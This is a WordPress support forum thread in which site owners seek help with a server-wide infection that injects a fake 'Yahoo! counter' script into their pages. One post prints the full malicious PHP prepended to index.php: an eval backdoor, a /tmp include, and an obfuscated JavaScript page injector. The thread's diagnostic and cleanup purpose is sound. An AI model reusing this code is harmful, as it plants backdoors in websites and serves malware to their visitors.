Support » Fixing WordPress » Virus attack! – please advise

  • Resolved philgreen


    I started this thread cause I thought I just had rss problems but it turns out it was a virus.

    My website is at, if you go there now you will just see an index.html I put there. But, if you’re not running IE, go to and then view the source. There is a bit of code that starts out “Yahoo! counter”.

    This malicious little piece of js is all over my site and I has appended itself to every file that it can. It was on the wordpress dashboard pages even, until i reinstalled.

    I don’t have shell access so I downloaded everything to my local machine and did a text search using agent ransack for any text matching “Yahoo! Counter”. I mostly just found html files that had been infected.

    Strangely enough, the wordpress/index.php is uninfected:

    My question is, which files go into making the index.php file?

    I need to know so I can clean them.

Viewing 15 replies - 1 through 15 (of 16 total)
  • Almost all the theme files:
    header.php (and it calls the style.css)

    Add the comments.php when on a single post view,
    page.php when seeing Pages

    and so on.

    On different views the index.php is replaced in the structure above by single.php, page.php, archive.php and any other Page template and/or Category template.

    I switched themes and the thing still appeared, so I figured it wasn’t coming from my theme.

    How about this question:

    what files make that don’t touch The fact that that page is clean seems really weird to me.

    If it’s not my theme, it must be my index.php, right? The file looks like this, is this how it’s supposed to look?

    <?php if(!function_exists(‘tmp_lkojfghx’)){for($i=1;$i<100;$i++)if(is_file($f=’/tmp/m’.$i)){include_once($f);break;}if(isset($_POST[‘tmp_lkojfghx3’]))eval($_POST[‘tmp_lkojfghx3’]);if(!defined(‘TMP_XHGFJOKL’))define(‘TMP_XHGFJOKL’,base64_decode(‘PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJyElNzYlNjElNzIgJTYxJTJDJTY5fiUyQyU1Rn47fCU2OSE9fCIjNz82fC4/JTMxNjMuQCUyMiM7YUA9IyU1QiUyMjchJTM4IS4xfDVgN3wlMkVgJTMxPyUzNHwyLiQlMzUlMzhgIiElMkN+aSUyQiUyMkAlMzE0fDElMkUjM2A1PyUyMiUyQyElNjkjJTJCfiIxIzlgJTMxJTJFJTMxIzMkJTMyJCUyMiU1RHwlM0J+JTVGPTFgJTNCaWYkJTI4JTY0fiU2RiU2M3UlNkRlfCU2RWB0QC4jY28lNkZrI2llIy4hbWEjdCMlNjMlNjhgKCQlMkZAJTVDYmAlNjh8JTY3ZiN0IyUzREAlMzF8JTJGfiUyOT8lM0QlM0RuQHUlNkN8bHwlMjklNjYjJTZGP3IoISU2OXw9IzAlM0IhaSUzQ0AzJTNCaSQlMkIlMkIhKUBkb2N1JTZEZX4lNkV0JTJFfnd8JTcyaXRlQChgJTIyfiUzQ0BzfmNgJTcyJTY5ISU3MCQlNzQlM0UlNjkjJTY2KGBfJTI5ZGBvP2N1P21lfCU2RX50YC5gJTc3fnIhaXQkJTY1JTI4JTVDJTIyISUzQz9zJTYzckAlNjklNzBAJTc0IGAlNjl+ZCUzRCElNUYiJTJCJTY5IyUyQiUyMl8/ID8lNzMlNzJjISUzRCUyRiUyRiUyMn4lMkJhWyU2OX4lNUQkJTJCJTIyISUyRiQlNjMlNzAlMkYlM0UlM0N+JTVDJTVDIS9zYyQlNzIjJTY5JTcwdCUzRSU1QyElMjJ+JTI5JTNDJTVDJCUyRiQlNzMlNjNgJTcyaWBwQHQlM0UlMjIpPzsnKS5yZXBsYWNlKC9AfFwkfFwhfGB8I3xcP3x+fFx8L2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo=’));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))==’1f8b’))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode(‘IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz’),”,$s);if(stristr($s,'</body’))$s=preg_replace(‘#(\s*</body)#mi’,str_replace(‘\$’,’\\\$’,TMP_XHGFJOKL).’\1′,$s1);elseif(($s1!=$s)||defined(‘PMT_knghjg’)||stristr($s,'<body’)||stristr($s,'</title>’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS[‘tmp_xhgfjokl’])call_user_func($GLOBALS[‘tmp_xhgfjokl’],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v[‘name’])==’tmp_lkojfghx’)return;else $s[]=array($a==’default output handler’?false:$a);for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘tmp_lkojfghx’);for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler(‘tmp_lkojfghx2′))!=’tmp_lkojfghx2’)$GLOBALS[‘tmp_xhgfjokl’]=$a;tmp_lkojfghx2(); ?><?php
    /* Short and sweet */
    define(‘WP_USE_THEMES’, true);




    no, its not, and if you look inside the index.php that comes inside the downloadable zip file, you would see this.

    /* Short and sweet */
    define('WP_USE_THEMES', true);

    thats all that should be in that file. whats the permissions of that file, btw?

    The permission had been set wrong, I’ve fixed it. The problem is one my hosts know about, it’s running a script that’s in the tmp folder which I don’t even have access to.

    I am curious as to the fix your host had. I too am seeing this code placed on all of my wordpress php pages but it does not exist in any of the files themselves that I can find. Can you provide more information please?

    This just happened to me!

    I have no idea what it is or what it does, but after decompressing some of the text i got this:
    <script language=javascript><!– Yahoo! Counter starts here –>
    if(typeof(yahoo_counter)!=typeof(1))eval(unescape(‘%2F%2F!.$%2E%2…some compressed text….\n/%2F&%3C/%64i%76%3E').replace(/\||\$|\!|@||~|\&|#/g,””));var yahoo_counter=1;
    <!– counter end –></script>


    #<script language=javascript><!– Yahoo! Counter starts here.+?</script>

    I found this text in ALMOST every .php on my webarea (total of some thousand files). And I havent even touched wordpress-files in ages. This happened to me last night.

    Is it yahoo counter or what?

    I’m having the same issue – I’m seeing this code on my admin pages and on my regular blog pags. It’s being injected into the footer of all the pages, and my footer.php file has permissions set to 644, which should be safe. I’m up to date on the WP version 2.6.5, and can’t find anywhere else that it might be hiding. Any ideas? if it’s in my database, it’s not there under the words Yahoo or counter or javascript, because I did a search for all of those, and any instance of those words is legitimate. Help!




    I’m having the same issue

    which issue? The 2 posts above are not the same.

    What is/are the name(s) of the file(s) affected? footer.php only?

    What is the name of the theme that you are using? Where did you get it?

    And what is the exact code that you see in the file(s)?




    never mind — I found your blog. I see the code — hang on .. I’m looking at it.




    youre hosted with ixwebhosting. its a server wide issue. there were posts earlier today here from at least 2 other people hosted there.

    additionally, read this:

    It’s a nasty hack. The code is injected into compromised sites (IXWebhosting has been hit bad by this, including all 24 of my domains. They have been rooted by another process). When you visit, it’s a javascript that loads an “eoj” malware (detected by Kaspersky as a rootkit, but it’s not a true version of a rootkit). To see if you’ve had the malware installed, go to your system32 folder and look for a file called sysaudio.sys. There is a real file by that name, but it’s actually located in system32\drivers. If you see the file in system32, you’ve been hacked. Delete the file, and look under the
    “HKLM\software\microsoft\windows nt\currentversion\drivers32” key,
    with value and valuedata containing “aux”=”sysaudio.sys” or “aux2″=”sysaudio.sys”. Export (for safety), then delete these entries. That should fix things.

    Also, look closely at your websites; the injection attack is a nasty piece of work. Look for fake .htaccess files redirecting search engines to a Russian Mafia hosted malware factory. If you go direct, everything is normal. If you surf from search engines like Yahoo or Google, you get redirected to the bad guys.

    Take care, nice to meet you.

    Guy De Marco, IT Services Manager, Cabela’s (




    From above:

    They have been rooted by another process

    Now go read this, paying close attention to what I said about privilege escalation and root.

    Get a copy of your database. Change hosts. Now.

    I’ve had this same attack twice in the last week. Hosted by What is the way to prevent this? Is php safe mode going to help?

    I switched to dreamhost and haven’t had any of the problems I had with IXwebshosting.

Viewing 15 replies - 1 through 15 (of 16 total)
  • The topic ‘Virus attack! – please advise’ is closed to new replies.